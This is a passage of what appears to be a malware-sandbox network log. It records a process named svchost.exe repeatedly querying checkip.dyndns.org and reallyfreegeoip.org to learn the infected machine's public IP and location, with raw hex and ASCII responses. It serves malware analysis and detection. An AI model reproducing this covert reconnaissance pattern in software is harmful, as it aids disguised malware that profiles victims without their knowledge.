Jan 8, 2025 16:34:11.361742973 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ed3ce7078ecebe3f5fd8c08108fbea97 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	158.101.44.242	80	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:34:12.014612913 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 16:34:12.577009916 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ea148253cb121fc5e082231f4b68e164 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	158.101.44.242	80	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:34:13.249078035 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 16:34:13.832098007 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9d92f5dac0ef47b33e0676f8a1287dff Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49715	158.101.44.242	80	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:34:14.447521925 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 16:34:15.013839006 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5c44f1a4201ca63bc460f2f293ba6886 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	158.101.44.242	80	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:34:15.672017097 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 16:34:16.242654085 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d3c0df32d40c04f24a9ea4981e6edff4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49719	158.101.44.242	80	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 8, 2025 16:34:16.914609909 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 8, 2025 16:34:17.476406097 CET	321	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:17 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ec63cb99f2d1b254fc5fe73c529f7614 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:07 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 15:34:07 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:07 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665237 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2BLqg3puSfGZ%2FCua6xEhRMw3j7HvCtw1FOo8vYdlcrFMH%2F1W5JN2NIK6k2XeeIEtZgLLPcrhHmOk8Q0vL6KN%2BlHYtTzaKZH9e015MyAJZuubFqeyNA8f6zvKhDNQmhbqlhZ8srX2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed3ffb9ab87274-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2195&min_rtt=2064&rtt_var=867&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1414728&cwnd=182&unsent_bytes=0&cid=8d8972ae4a3b76cd&ts=173&x=0"
2025-01-08 15:34:07 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:08 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 15:34:08 UTC	855	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665237 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lL6ivVR14VU1ZErSaitVdcJzhRsN4aJy2gi1eQzNc71HkAcVTZY%2FT35kh5q8uNik3%2FDhcKLZPtmFrfEpyPYpifyiLnvoBQmf4ag6cxOxWdWbwFwaW7fGytCv8FXn7GiaJA%2BgOLse"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed4000a8138c6f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2014&rtt_var=774&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1397797&cwnd=213&unsent_bytes=0&cid=e77c65e8b82d240f&ts=160&x=0"
2025-01-08 15:34:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:10 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 15:34:10 UTC	854	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665239 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=caroNO8z4F8oxuB6U5mf7K8hztxTH793TGP0J94lgk6SA0QjMPyWezYDPW5UvTmQabFDCCfkSoibYqvEdP4V0xLPKtc6qzqBmVUOzETsWVznrTiQQHg%2BtI%2B3OjGXDJxtEHkL69bX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed400cdb9cde93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3834&min_rtt=1652&rtt_var=2086&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1767554&cwnd=248&unsent_bytes=0&cid=cbf31c3db2d5362f&ts=869&x=0"
2025-01-08 15:34:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:11 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 15:34:11 UTC	869	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665241 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xyuah0%2BXJ%2Bh%2B2a4%2F2nNMIDXxVy%2FKfFtI675gQbd1QsD1EYwze%2Bvf06%2FoZOAGA1MjjBlt%2FnjpjkLXWNlly87JoZZ2QFDsMYMTDcjyzCByYyIPzprwsDi3%2BhGZmRwK%2Fjwi2Iqz5z2e"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed40147b454289-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1737&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1638608&cwnd=150&unsent_bytes=0&cid=d01d2c54bf04103d&ts=170&x=0"
2025-01-08 15:34:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49712	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:13 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-08 15:34:13 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665242 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2FMKp4S6A5I2avJCYDaZrxDvZDBFQF%2F1tewYQqwVvQvQeMkHW6IZIVFV76FKLbhxIZYKH3HGwR9rLq63mJAlf9PZoVDUyXC8nzQzLEc7RkXfI%2B34MGoyPxCAL40kX6J1%2Byxfzq8O"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed401c4bf642e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1677&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1672394&cwnd=242&unsent_bytes=0&cid=b5861b7089899252&ts=147&x=0"
2025-01-08 15:34:13 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49714	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 15:34:14 UTC	855	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665243 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ts0T5PWGtxtbepyqP4VBb%2Be9oN32kHPr7MtOPWnQVIKJ5tregDS7N%2FxsP3fPA%2BQSx9xifAFWKJotpHrSwdPIaOeoen7v1XHmZlUs5870u7waROAARBK0az37wPxwxJpTr7W6KfaY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed4023cc9c42b1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1758&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1660978&cwnd=211&unsent_bytes=0&cid=ecb0d243f97ea019&ts=144&x=0"
2025-01-08 15:34:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49716	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:15 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 15:34:15 UTC	859	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665244 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ncu7hPCUIPteMoK41k7u%2BwYU%2FNkgHh%2BeTZQ5YFAO7MgVrtwZy0KadDHFXHSFeS2IljZlKVGSrtKLYFzMtfmc1LXURFYdJwQjcE5Cgoyt%2F4YL2qLsfFRO8NyNMPfQ%2B6eZkFsS6KDO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed402b5f594233-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2135&min_rtt=1723&rtt_var=1470&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=581557&cwnd=219&unsent_bytes=0&cid=95102a7374a93523&ts=139&x=0"
2025-01-08 15:34:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	188.114.96.3	443	5004	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 15:34:16 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-08 15:34:16 UTC	857	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 15:34:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1665245 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0OSGOncot2wV4fkdSDavFRmAuG3w0VWlAwlyXMpp0LENHzKe2J%2BK07cxLIOiiO0AN%2FaLU2PBOOPbhGlndOrartuhUc%2Be2npvBrHAF8c0zdErt5CMxGad8C7tNYqhnQjd%2By6Eawh7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fed40331fc68cc6-EWR alt-svc: h3=":443"; ma=86400 server-timing: 